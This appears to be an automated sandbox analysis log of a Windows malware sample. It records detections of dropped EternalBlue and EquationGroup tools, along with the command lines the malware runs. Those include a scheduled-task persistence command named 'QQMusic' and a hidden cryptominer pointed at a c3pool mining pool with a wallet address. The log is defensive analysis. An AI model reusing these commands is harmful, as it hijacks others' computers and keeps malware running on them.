Source: C:\ProgramData\tibe.dll, type: DROPPED Matched rule: EquationGroup_Toolset_Apr17_Architouch_Eternalsynergy_Smbtouch date = 2017-04-15, hash3 = 108243f61c53f00f8f1adcf67c387a8833f1a2149f063dd9ef29205c90a3c30a, hash2 = 92c6a9e648bfd98bbceea3813ce96c6861487826d6b2c3d462debae73ed25b34, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 444979a2387530c8fbbc5ddb075b15d6a4717c3435859955f37ebc0f40a4addc
Source: C:\ProgramData\tibe.dll, type: DROPPED Matched rule: EquationGroup_Toolset_Apr17__ecwi_ESKE_EVFR_RPC2_2 date = 2017-04-15, hash4 = 5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337, hash3 = c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674, hash2 = 9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = c4152f65e45ff327dade50f1ac3d3b876572a66c1ce03014f2877cea715d9afd
Source: C:\ProgramData\tibe.dll, type: DROPPED Matched rule: EquationGroup_Toolset_Apr17__EAFU_ecwi_ESKE_EVFR_RPC2_4 date = 2017-04-15, hash5 = 5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337, hash4 = c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674, hash3 = 9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556, hash2 = c4152f65e45ff327dade50f1ac3d3b876572a66c1ce03014f2877cea715d9afd, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 3e181ca31f1f75a6244b8e72afaa630171f182fbe907df4f8b656cc4a31602f6
Source: C:\ProgramData\tibe.dll, type: DROPPED Matched rule: EquationGroup_Toolset_Apr17__ESKE_RPC2_8 date = 2017-04-15, hash2 = 5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556
Source: C:\ProgramData\serverlong.xml, type: DROPPED Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: C:\ProgramData\serverlong.exe, type: DROPPED Matched rule: EquationGroup_Toolset_Apr17_Erraticgopher_1_0_1 date = 2017-04-15, hash1 = 3d11fe89ffa14f267391bc539e6808d600e465955ddb854201a1f31a9ded4052, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\ProgramData\serverlong.exe, type: DROPPED Matched rule: EquationGroup_Toolset_Apr17_Doublepulsar_1_3_1 date = 2017-04-15, hash1 = 15ffbb8d382cd2ff7b0bd4c87a7c0bffd1541c2fe86865af445123bc0b770d13, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\ProgramData\serverlong.exe, type: DROPPED Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: C:\ProgramData\etch-0.dll, type: DROPPED Matched rule: EquationGroup_Toolset_Apr17_Architouch_Eternalsynergy_Smbtouch date = 2017-04-15, hash3 = 108243f61c53f00f8f1adcf67c387a8833f1a2149f063dd9ef29205c90a3c30a, hash2 = 92c6a9e648bfd98bbceea3813ce96c6861487826d6b2c3d462debae73ed25b34, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 444979a2387530c8fbbc5ddb075b15d6a4717c3435859955f37ebc0f40a4addc
Source: C:\ProgramData\spread.txt, type: DROPPED Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: C:\ProgramData\SMB.exe Code function: String function: 0133D810 appears 31 times
Source: C:\ProgramData\SMB.exe Code function: String function: 0133CDF0 appears 37 times
Source: C:\ProgramData\SMB.exe Code function: String function: 0133CEC0 appears 53 times
Source: C:\ProgramData\SMB.exe Code function: 37_2_01327070: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW, 37_2_01327070
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process token adjusted: Security
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.spre.expl.evad.mine.winEXE@125/61@2/2
Source: C:\ProgramData\SMB.exe File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_00405C60 GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,CreateFileA,WriteFile,FindCloseChangeNotification, 0_2_00405C60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe /F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe /F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ipconfig /flushdns
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\SMB.exe C:\ProgramData\SMB.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\SMB.exe C:\ProgramData\SMB.exe
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe"
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe /F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ipconfig /flushdns
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\SMB.exe C:\ProgramData\SMB.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\SMB.exe C:\ProgramData\SMB.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe /F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\ProgramData\SMB.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "cywkjq.exe")
Source: C:\Windows\SysWOW64\cmd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "cywkjq.exe")
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_00416670 CoCreateInstance, 0_2_00416670
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_00405440 GetDiskFreeSpaceExA, 0_2_00405440
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_0041F6E0 GetWindowThreadProcessId,CreateToolhelp32Snapshot,Process32First,wsprintfA,FindCloseChangeNotification,Process32Next,CloseHandle, 0_2_0041F6E0
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6320:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6744:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5760:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6608:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6920:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6392:120:WilError_01
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Mutant created: \Sessions\1\BaseNamedObjects\caiyundf.cn
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6528:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4152:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6440:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1632:120:WilError_01
